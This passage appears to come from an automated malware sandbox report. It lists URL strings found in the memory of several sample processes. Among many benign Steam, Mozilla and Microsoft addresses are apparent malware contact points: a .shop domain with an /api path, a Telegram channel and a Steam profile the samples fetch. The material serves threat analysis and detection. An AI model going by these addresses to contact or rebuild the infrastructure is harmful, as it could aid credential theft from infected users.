                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=1rP88j3WZLBx&amp
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=engl
                Source: 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/heade
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp, HCFIII.9.drString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp, HCFIII.9.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: explorer.exe, 00000001.00000000.1697094973.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://help.steampowered.com/en/
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
                Source: explorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
                Source: HCFIII.9.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.drString found in binary or memory: https://mozilla.org0/
                Source: explorer.exe, 00000001.00000000.1697094973.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: explorer.exe, 00000001.00000000.1697094973.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                Source: 76561199689717899[1].htm.9.drString found in binary or memory: https://steamcommunity.com/
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000884000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2410519110.000000000086F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/c
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://steamcommunity.com/discussions/
                Source: kat796E.tmp, 00000009.00000003.2561219190.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2442796104.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/ho
                Source: 76561199689717899[1].htm.9.drString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199689717899
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/m
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://steamcommunity.com/market/
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://steamcommunity.com/my/wishlist/
                Source: kat796E.tmp, 00000009.00000003.2410519110.000000000086F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899$
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/badges
                Source: kat796E.tmp, 00000009.00000003.2561219190.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2442796104.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/inventory/
                Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000422000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899r0isMozilla/5.0
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199689717899tS
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000884000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2410519110.000000000086F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/s
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://steamcommunity.com/workshop/
                Source: 76561199689717899[1].htm.9.drString found in binary or memory: https://store.steampowered.com/
                Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                Source: 76561199689717899[1].htm.9.drString found in binary or memory: https://store.steampowered.com/about/
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://store.steampowered.com/explore/
                Source: kat796E.tmp, 00000009.00000003.2561219190.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2442796104.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2410519110.000000000088B000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://store.steampowered.com/legal/
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://store.steampowered.com/mobile
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://store.steampowered.com/news/
                Source: kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://store.steampowered.com/stats/
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: F441.exe, 00000006.00000003.2060569884.0000000002CDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                Source: JKEGDH.9.drString found in binary or memory: https://support.mozilla.org
                Source: JKEGDH.9.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: F441.exe, 00000006.00000003.2104123023.0000000002DA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: JKEGDH.9.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                Source: F441.exe, 00000006.00000003.2060569884.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2536615171.0000000000951000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2522727838.000000000093B000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000060B000.00000040.00000400.00020000.00000000.sdmp, BFCFBF.9.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: BFCFBF.9.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
                Source: F441.exe, 00000006.00000003.2060569884.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2536615171.0000000000951000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2522727838.000000000093B000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000060B000.00000040.00000400.00020000.00000000.sdmp, BFCFBF.9.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: BFCFBF.9.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: kat796E.tmp, 00000009.00000002.2823531512.000000000060B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
                Source: 9EDA.exe, 00000008.00000002.2367767500.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, 9EDA.exe, 00000008.00000002.2367654116.0000000004490000.00000040.00001000.00020000.00000000.sdmp, 9EDA.exe, 00000008.00000002.2367245852.0000000004190000.00000040.00001000.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.0000000000422000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/copterwin
                Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000422000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://t.me/copterwinr0isMozilla/5.0
                Source: F441.exe, 00000006.00000003.2351445526.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, F441.exe, 00000006.00000002.2557803498.000000000055A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whispedwoodmoodsksl.shop/
                Source: F441.exe, 00000006.00000002.2557803498.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whispedwoodmoodsksl.shop//E
                Source: F441.exe, 00000006.00000003.2351445526.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whispedwoodmoodsksl.shop/B9E
                Source: F441.exe, 00000006.00000003.2351445526.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whispedwoodmoodsksl.shop/aFX
                Source: F441.exe, 00000006.00000002.2557803498.000000000055A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whispedwoodmoodsksl.shop/api
                Source: F441.exe, 00000006.00000002.2557803498.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://whispedwoodmoodsksl.shop/l
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                Source: explorer.exe, 00000001.00000000.1697094973.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
                Source: explorer.exe, 00000001.00000000.1697094973.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp, HCFIII.9.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.drString found in binary or memory: https://www.digicert.com/CPS0
                Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp, HCFIII.9.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
